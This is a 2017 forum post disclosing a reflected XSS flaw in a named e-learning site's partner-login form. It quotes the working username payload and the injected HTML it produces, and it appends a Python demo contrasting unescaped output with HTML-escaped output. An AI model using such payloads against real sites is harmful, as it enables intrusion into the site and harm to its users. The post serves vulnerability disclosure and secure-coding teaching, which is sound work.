XSS vulnerability in partner-login

Post by hddananjaya » Tue Jan 31, 2017 8:12 pm

Cross-Site Scripting (XSS) vulnerability in partner-login

Study Case : efrontlearning.com/partner-login

Payload :
username :
"><object data=alert('@_hddananjaya')>

password : anything

Then what happens :
The HTML code will be replaced like this:
<input id="login" type="text" class="form-control" name="login" placeholder="Enter username" style="color:#000" autofocus value=""><object data=javascript:alert('@_hddananjaya')>">


Result : <object data=javascript:alert('@_hddananjaya')> will execute and a pop-up will show my Twitter ID

How bad it is and how to prevent it : visit the Open Web Application Security Project (OWASP)

HD Dananjaya (@_hddananjaya)
Cyber Security Researcher
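
Added example, not part of the original post and not eFront's own code: a Python stand-in for the server-side template that echoes the username into the value attribute, shown unescaped and then with HTML attribute escaping. The function names and the use of Python are assumptions made for illustration; the markup and the payload are the ones quoted in the post.

```python
import html
from html.parser import HTMLParser

# Payload as it appears in the rendered HTML quoted in the post.
PAYLOAD = "\"><object data=javascript:alert('@_hddananjaya')>"

# The login field from the post, with a slot for the echoed username.
TEMPLATE = ('<input id="login" type="text" class="form-control" name="login" '
            'placeholder="Enter username" style="color:#000" autofocus value="{}">')


def render_vulnerable(username: str) -> str:
    """Before: the submitted value is echoed into the attribute unescaped."""
    return TEMPLATE.format(username)


def render_hardened(username: str) -> str:
    """After: escape &, <, >, " and ' so the value cannot leave the attribute."""
    return TEMPLATE.format(html.escape(username, quote=True))


class TagCollector(HTMLParser):
    """Records each start tag and the login field's value as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.login_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.login_value = dict(attrs).get("value")


def parse(markup: str) -> TagCollector:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        result = parse(render(PAYLOAD))
        print(f"{name}: tags={result.tags} value={result.login_value!r}")
```

In the hardened output the parser sees a single input element whose value is the submitted string verbatim, so the user still gets their text back in the field but no new element is created.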